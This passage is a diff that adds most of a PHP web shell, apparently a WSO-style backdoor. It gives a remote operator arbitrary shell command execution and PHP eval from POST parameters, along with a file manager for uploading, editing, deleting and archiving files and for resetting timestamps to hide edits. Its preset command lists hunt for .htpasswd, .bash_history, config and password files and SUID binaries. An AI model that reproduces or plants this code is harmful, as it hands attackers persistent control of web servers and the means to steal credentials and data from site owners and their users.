+ | echo '<br><br>'; | ||
+ | switch($_POST['p2']) { | ||
+ | case 'view': | ||
+ | echo '<pre class=ml1>'; | ||
+ | $fp = @fopen($_POST['p1'], 'r'); | ||
+ | if($fp) { | ||
+ | while( !@feof($fp) ) | ||
+ | echo htmlspecialchars(@fread($fp, 1024)); | ||
+ | @fclose($fp); | ||
+ | } | ||
+ | echo '</pre>'; | ||
+ | break; | ||
+ | case 'highlight': | ||
+ | if( @is_readable($_POST['p1']) ) { | ||
+ | echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; | ||
+ | $code = @highlight_file($_POST['p1'],true); | ||
+ | echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; | ||
+ | } | ||
+ | break; | ||
+ | case 'chmod': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $perms = 0; | ||
+ | for($i=strlen($_POST['p3'])-1;$i>=0;--$i) | ||
+ | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); | ||
+ | if(!@chmod($_POST['p1'], $perms)) | ||
+ | echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; | ||
+ | } | ||
+ | clearstatcache(); | ||
+ | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'edit': | ||
+ | if( !is_writable($_POST['p1'])) { | ||
+ | echo 'File isn\'t writeable'; | ||
+ | break; | ||
+ | } | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $time = @filemtime($_POST['p1']); | ||
+ | $_POST['p3'] = substr($_POST['p3'],1); | ||
+ | $fp = @fopen($_POST['p1'],"w"); | ||
+ | if($fp) { | ||
+ | @fwrite($fp,$_POST['p3']); | ||
+ | @fclose($fp); | ||
+ | echo 'Saved!<br><script>p3_="";</script>'; | ||
+ | @touch($_POST['p1'],$time,$time); | ||
+ | } | ||
+ | } | ||
+ | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; | ||
+ | $fp = @fopen($_POST['p1'], 'r'); | ||
+ | if($fp) { | ||
+ | while( !@feof($fp) ) | ||
+ | echo htmlspecialchars(@fread($fp, 1024)); | ||
+ | @fclose($fp); | ||
+ | } | ||
+ | echo '</textarea><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'hexdump': | ||
+ | $c = @file_get_contents($_POST['p1']); | ||
+ | $n = 0; | ||
+ | $h = array('00000000<br>','',''); | ||
+ | $len = strlen($c); | ||
+ | for ($i=0; $i<$len; ++$i) { | ||
+ | $h[1] .= sprintf('%02X',ord($c[$i])).' '; | ||
+ | switch ( ord($c[$i]) ) { | ||
+ | case 0: $h[2] .= ' '; break; | ||
+ | case 9: $h[2] .= ' '; break; | ||
+ | case 10: $h[2] .= ' '; break; | ||
+ | case 13: $h[2] .= ' '; break; | ||
+ | default: $h[2] .= $c[$i]; break; | ||
+ | } | ||
+ | $n++; | ||
+ | if ($n == 32) { | ||
+ | $n = 0; | ||
+ | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} | ||
+ | $h[1] .= '<br>'; | ||
+ | $h[2] .= "\n"; | ||
+ | } | ||
+ | } | ||
+ | echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; | ||
+ | break; | ||
+ | case 'rename': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | if(!@rename($_POST['p1'], $_POST['p3'])) | ||
+ | echo 'Can\'t rename!<br>'; | ||
+ | else | ||
+ | die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); | ||
+ | } | ||
+ | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'touch': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $time = strtotime($_POST['p3']); | ||
+ | if($time) { | ||
+ | if(!touch($_POST['p1'],$time,$time)) | ||
+ | echo 'Fail!'; | ||
+ | else | ||
+ | echo 'Touched!'; | ||
+ | } else echo 'Bad time format!'; | ||
+ | } | ||
+ | clearstatcache(); | ||
+ | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | if($os == 'win') | ||
+ | $aliases = array( | ||
+ | "List Directory" => "dir", | ||
+ | "Find index.php in current dir" => "dir /s /w /b index.php", | ||
+ | "Find *config*.php in current dir" => "dir /s /w /b *config*.php", | ||
+ | "Show active connections" => "netstat -an", | ||
+ | "Show running services" => "net start", | ||
+ | "User accounts" => "net user", | ||
+ | "Show computers" => "net view", | ||
+ | "ARP Table" => "arp -a", | ||
+ | "IP Configuration" => "ipconfig /all" | ||
+ | ); | ||
+ | else | ||
+ | $aliases = array( | ||
+ | "List dir" => "ls -lha", | ||
+ | "list file attributes on a Linux second extended file system" => "lsattr -va", | ||
+ | "show opened ports" => "netstat -an | grep -i listen", | ||
+ | "process status" => "ps aux", | ||
+ | "Find" => "", | ||
+ | "find all suid files" => "find / -type f -perm -04000 -ls", | ||
+ | "find suid files in current dir" => "find . -type f -perm -04000 -ls", | ||
+ | "find all sgid files" => "find / -type f -perm -02000 -ls", | ||
+ | "find sgid files in current dir" => "find . -type f -perm -02000 -ls", | ||
+ | "find config.inc.php files" => "find / -type f -name config.inc.php", | ||
+ | "find config* files" => "find / -type f -name \"config*\"", | ||
+ | "find config* files in current dir" => "find . -type f -name \"config*\"", | ||
+ | "find all writable folders and files" => "find / -perm -2 -ls", | ||
+ | "find all writable folders and files in current dir" => "find . -perm -2 -ls", | ||
+ | "find all service.pwd files" => "find / -type f -name service.pwd", | ||
+ | "find service.pwd files in current dir" => "find . -type f -name service.pwd", | ||
+ | "find all .htpasswd files" => "find / -type f -name .htpasswd", | ||
+ | "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", | ||
+ | "find all .bash_history files" => "find / -type f -name .bash_history", | ||
+ | "find .bash_history files in current dir" => "find . -type f -name .bash_history", | ||
+ | "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", | ||
+ | "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", | ||
+ | "Locate" => "", | ||
+ | "locate httpd.conf files" => "locate httpd.conf", | ||
+ | "locate vhosts.conf files" => "locate vhosts.conf", | ||
+ | "locate proftpd.conf files" => "locate proftpd.conf", | ||
+ | "locate psybnc.conf files" => "locate psybnc.conf", | ||
+ | "locate my.conf files" => "locate my.conf", | ||
+ | "locate admin.php files" =>"locate admin.php", | ||
+ | "locate cfg.php files" => "locate cfg.php", | ||
+ | "locate conf.php files" => "locate conf.php", | ||
+ | "locate config.dat files" => "locate config.dat", | ||
+ | "locate config.php files" => "locate config.php", | ||
+ | "locate config.inc files" => "locate config.inc", | ||
+ | "locate config.inc.php" => "locate config.inc.php", | ||
+ | "locate config.default.php files" => "locate config.default.php", | ||
+ | "locate config* files " => "locate config", | ||
+ | "locate .conf files"=>"locate '.conf'", | ||
+ | "locate .pwd files" => "locate '.pwd'", | ||
+ | "locate .sql files" => "locate '.sql'", | ||
+ | "locate .htpasswd files" => "locate '.htpasswd'", | ||
+ | "locate .bash_history files" => "locate '.bash_history'", | ||
+ | "locate .mysql_history files" => "locate '.mysql_history'", | ||
+ | "locate .fetchmailrc files" => "locate '.fetchmailrc'", | ||
+ | "locate backup files" => "locate backup", | ||
+ | "locate dump files" => "locate dump", | ||
+ | "locate priv files" => "locate priv" | ||
+ | ); | ||
+ | function actionConsole() { | ||
+ | if(!empty($_POST['p1']) && !empty($_POST['p2'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); | ||
+ | $_POST['p1'] .= ' 2>&1'; | ||
+ | } elseif(!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); | ||
+ | if(isset($_POST['ajax'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); | ||
+ | ob_start(); | ||
+ | echo "d.cf.cmd.value='';\n"; | ||
+ | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); | ||
+ | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { | ||
+ | if(@chdir($match[1])) { | ||
+ | $GLOBALS['cwd'] = @getcwd(); | ||
+ | echo "c_='".$GLOBALS['cwd']."';"; | ||
+ | } | ||
+ | } | ||
+ | echo "d.cf.output.value+='".$temp."';"; | ||
+ | echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; | ||
+ | $temp = ob_get_clean(); | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); | ||
+ | hardHeader(); | ||
+ | echo "<script> | ||
+ | if(window.Event) window.captureEvents(Event.KEYDOWN); | ||
+ | var cmds = new Array(''); | ||
+ | var cur = 0; | ||
+ | function kp(e) { | ||
+ | var n = (window.Event) ? e.which : e.keyCode; | ||
+ | if(n == 38) { | ||
+ | cur--; | ||
+ | if(cur>=0) | ||
+ | document.cf.cmd.value = cmds[cur]; | ||
+ | else | ||
+ | cur++; | ||
+ | } else if(n == 40) { | ||
+ | cur++; | ||
+ | if(cur < cmds.length) | ||
+ | document.cf.cmd.value = cmds[cur]; | ||
+ | else | ||
+ | cur--; | ||
+ | } | ||
+ | } | ||
+ | function add(cmd) { | ||
+ | cmds.pop(); | ||
+ | cmds.push(cmd); | ||
+ | cmds.push(''); | ||
+ | cur = cmds.length-1; | ||
+ | } | ||
+ | </script>"; | ||
+ | echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; | ||
+ | foreach($GLOBALS['aliases'] as $n => $v) { | ||
+ | if($v == '') { | ||
+ | echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; | ||
+ | continue; | ||
+ | } | ||
+ | echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; | ||
+ | } | ||
+ | |||
+ | echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); | ||
+ | } | ||
+ | echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; | ||
+ | echo '</form></div><script>d.cf.cmd.focus();</script>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionPhp() { | ||
+ | if( isset($_POST['ajax']) ) { | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; | ||
+ | ob_start(); | ||
+ | eval($_POST['p1']); | ||
+ | $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | hardHeader(); | ||
+ | if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { | ||
+ | echo '<h1>PHP info</h1><div class=content>'; | ||
+ | ob_start(); | ||
+ | phpinfo(); | ||
+ | $tmp = ob_get_clean(); | ||
+ | $tmp = preg_replace('!body {.*}!msiU','',$tmp); | ||
+ | $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); | ||
+ | $tmp = preg_replace('!h1!msiU','h2',$tmp); | ||
+ | $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); | ||
+ | $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); | ||
+ | echo $tmp; | ||
+ | echo '</div><br>'; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; | ||
+ | echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; | ||
+ | echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | ob_start(); | ||
+ | eval($_POST['p1']); | ||
+ | echo htmlspecialchars(ob_get_clean()); | ||
+ | } | ||
+ | echo '</pre></div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionFilesMan() { | ||
+ | if (!empty ($_COOKIE['f'])) | ||
+ | $_COOKIE['f'] = @unserialize($_COOKIE['f']); | ||
+ | |||
+ | if(!empty($_POST['p1'])) { | ||
+ | switch($_POST['p1']) { | ||
+ | case 'uploadFile': | ||
+ | if ( is_array($_FILES['f']['tmp_name']) ) { | ||
+ | foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { | ||
+ | if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { | ||
+ | echo "Can't upload file!"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | break; | ||
+ | case 'mkdir': | ||
+ | if(!@mkdir($_POST['p2'])) | ||
+ | echo "Can't create new dir"; | ||
+ | break; | ||
+ | case 'delete': | ||
+ | function deleteDir($path) { | ||
+ | $path = (substr($path,-1)=='/') ? $path:$path.'/'; | ||
+ | $dh = opendir($path); | ||
+ | while ( ($â = readdir($dh) ) !== false) { | ||
+ | $â = $path.$â; | ||
+ | if ( (basename($â) == "..") || (basename($â) == ".") ) | ||
+ | continue; | ||
+ | $type = filetype($â); | ||
+ | if ($type == "dir") | ||
+ | deleteDir($â); | ||
+ | else | ||
+ | @unlink($â); | ||
+ | } | ||
+ | closedir($dh); | ||
+ | @rmdir($path); | ||
+ | } | ||
+ | if(is_array(@$_POST['f'])) | ||
+ | foreach($_POST['f'] as $f) { | ||
+ | if($f == '..') | ||
+ | continue; | ||
+ | $f = urldecode($f); | ||
+ | if(is_dir($f)) | ||
+ | deleteDir($f); | ||
+ | else | ||
+ | @unlink($f); | ||
+ | } | ||
+ | break; | ||
+ | case 'paste': | ||
+ | if($_COOKIE['act'] == 'copy') { | ||
+ | function copy_paste($c,$s,$d){ | ||
+ | if(is_dir($c.$s)){ | ||
+ | mkdir($d.$s); | ||
+ | $h = @opendir($c.$s); | ||
+ | while (($f = @readdir($h)) !== false) | ||
+ | if (($f != ".") and ($f != "..")) | ||
+ | copy_paste($c.$s.'/',$f, $d.$s.'/'); | ||
+ | } elseif(is_file($c.$s)) | ||
+ | @copy($c.$s, $d.$s); | ||
+ | } | ||
+ | foreach($_COOKIE['f'] as $f) | ||
+ | copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); | ||
+ | } elseif($_COOKIE['act'] == 'move') { | ||
+ | function move_paste($c,$s,$d){ | ||
+ | if(is_dir($c.$s)){ | ||
+ | mkdir($d.$s); | ||
+ | $h = @opendir($c.$s); | ||
+ | while (($f = @readdir($h)) !== false) | ||
+ | if (($f != ".") and ($f != "..")) | ||
+ | copy_paste($c.$s.'/',$f, $d.$s.'/'); | ||
+ | } elseif(@is_file($c.$s)) | ||
+ | @copy($c.$s, $d.$s); | ||
+ | } | ||
+ | foreach($_COOKIE['f'] as $f) | ||
+ | @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); | ||
+ | } elseif($_COOKIE['act'] == 'zip') { | ||
+ | if(class_exists('ZipArchive')) { | ||
+ | $zip = new ZipArchive(); | ||
+ | if ($zip->open($_POST['p2'], 1)) { | ||
+ | chdir($_COOKIE['c']); | ||
+ | foreach($_COOKIE['f'] as $f) { | ||
+ | if($f == '..') | ||
+ | continue; | ||
+ | if(@is_file($_COOKIE['c'].$f)) | ||
+ | $zip->addFile($_COOKIE['c'].$f, $f); | ||
+ | elseif(@is_dir($_COOKIE['c'].$f)) { | ||
+ | $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); | ||
+ | foreach ($iterator as $key=>$value) { | ||
+ | $zip->addFile(realpath($key), $key); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | chdir($GLOBALS['cwd']); | ||
+ | $zip->close(); | ||
+ | } | ||
+ | } | ||
+ | } elseif($_COOKIE['act'] == 'unzip') { | ||
+ | if(class_exists('ZipArchive')) { | ||
+ | $zip = new ZipArchive(); | ||
+ | foreach($_COOKIE['f'] as $f) { | ||
+ | if($zip->open($_COOKIE['c'].$f)) { | ||
+ | $zip->extractTo($GLOBALS['cwd']); | ||
+ | $zip->close(); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } elseif($_COOKIE['act'] == 'tar') { | ||
+ | chdir($_COOKIE['c']); | ||
+ | $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); | ||
+ | ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); | ||
+ | chdir($GLOBALS['cwd']); | ||
+ | } | ||
+ | unset($_COOKIE['f']); | ||
+ | setcookie('f', '', time() - 3600); | ||
+ | break; | ||
+ | default: | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | prototype('act', $_POST['p1']); | ||
+ | prototype('f', serialize(@$_POST['f'])); | ||
+ | prototype('c', @$_POST['c']); | ||
+ | } | ||
+ | break; | ||
+ | } | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; | ||
+ | $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); | ||
+ | if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } | ||
+ | global $sort; | ||
+ | $sort = array('name', 1); | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) | ||
+ | $sort = array($match[1], (int)$match[2]); | ||
+ | } | ||
+ | echo "<script> | ||
+ | function sa() { | ||
+ | for(i=0;i<d.files.elements.length;i++) | ||
+ | if(d.files.elements[i].type == 'checkbox') | ||
+ | d.files.elements[i].checked = d.files.elements[0].checked; | ||
+ | } | ||
+ | </script> | ||
+ | <table width='100%' class='main' cellspacing='0' cellpadding='2'> | ||
+ | <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; | ||
+ | $dirs = $files = array(); | ||
+ | $n = count($dirContent); | ||
+ | for($i=0;$i<$n;$i++) { | ||
+ | $ow = @posix_getpwuid(@fileowner($dirContent[$i])); | ||
+ | $gr = @posix_getgrgid(@filegroup($dirContent[$i])); | ||
+ | $tmp = array('name' => $dirContent[$i], | ||
+ | 'path' => $GLOBALS['cwd'].$dirContent[$i], | ||
+ | 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), | ||
+ | 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), | ||
+ | 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), | ||
+ | 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), | ||
+ | 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) | ||
+ | ); | ||
+ | if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $files[] = array_merge($tmp, array('type' => 'file')); | ||
+ | elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); | ||
+ | elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $dirs[] = array_merge($tmp, array('type' => 'dir')); | ||
+ | } | ||
+ | $GLOBALS['sort'] = $sort; | ||
+ | function cmp($a, $b) { | ||
+ | if($GLOBALS['sort'][0] != 'size') | ||
+ | return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); | ||
+ | else | ||
+ | return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); | ||
+ | } | ||
+ | usort($files, "cmp"); | ||
+ | usort($dirs, "cmp"); | ||
+ | $files = array_merge($dirs, $files); | ||
+ | $l = 0; | ||
+ | foreach($files as $f) { | ||
+ | echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] | ||
+ | .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; | ||
+ | $l = $l?0:1; | ||
+ | } | ||
+ | echo "<tr><td colspan=7> | ||
+ | <input type=hidden name=ne value=''> | ||
+ | <input type=hidden name=a value='FilesMan'> | ||
+ | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | ||
+ | <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> | ||
+ | <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; | ||
+ | if(class_exists('ZipArchive')) | ||
+ | echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; | ||
+ | echo "<option value='tar'>+ tar.gz</option>"; | ||
+ | if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) | ||
+ | echo "<option value='paste'>â³ Paste</option>"; | ||
+ | echo "</select> "; | ||
+ | if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) | ||
+ | echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; | ||
+ | echo "<input type='submit' value='>>'></td></tr></form></table></div>"; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionStringTools() { | ||
+ | if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} | ||
+ | if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} | ||
+ | if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} | ||
+ | if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} | ||
+ | if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} | ||
+ | $stringTools = array( | ||
+ | 'Base64 encode' => 'base64_encode', | ||
+ | 'Base64 decode' => 'base64_decode', | ||
+ | 'Url encode' => 'urlencode', | ||
+ | 'Url decode' => 'urldecode', | ||
+ | 'Full urlencode' => 'full_urlencode', | ||
+ | 'md5 hash' => 'md5', | ||
+ | 'sha1 hash' => 'sha1', | ||
+ | 'crypt' => 'crypt', | ||
+ | 'CRC32' => 'crc32', | ||
+ | 'ASCII to HEX' => 'ascii2hex', | ||
+ | 'HEX to ASCII' => 'hex2ascii', | ||
+ | 'HEX to DEC' => 'hexdec', | ||
+ | 'HEX to BIN' => 'hex2bin', | ||
+ | 'DEC to HEX' => 'dechex', | ||
+ | 'DEC to BIN' => 'decbin', | ||
+ | 'BIN to HEX' => 'binhex', | ||
+ | 'BIN to DEC' => 'bindec', | ||
+ | 'String to lower case' => 'strtolower', | ||
+ | 'String to upper case' => 'strtoupper', | ||
+ | 'Htmlspecialchars' => 'htmlspecialchars', | ||
+ | 'String length' => 'strlen', | ||
+ | ); | ||
+ | if(isset($_POST['ajax'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); | ||
+ | ob_start(); | ||
+ | if(in_array($_POST['p1'], $stringTools)) | ||
+ | echo $_POST['p1']($_POST['p2']); | ||
+ | $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); | ||
+ | hardHeader(); | ||
+ | echo '<h1>String conversions</h1><div class=content>'; | ||
+ | echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; | ||
+ | foreach($stringTools as $k => $v) | ||
+ | echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; | ||
+ | echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); | ||
+ | } | ||
+ | echo"</pre></div><br><h1>Search files:</h1><div class=content> | ||
+ | <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> | ||
+ | <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> | ||
+ | <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> | ||
+ | <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> | ||
+ | <tr><td></td><td><input type='submit' value='>>'></td></tr> | ||
+ | </table></form>"; | ||
+ | function hardRecursiveGlob($path) { | ||
+ | if(substr($path, -1) != '/') | ||
+ | $path.='/'; | ||
+ | $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); | ||
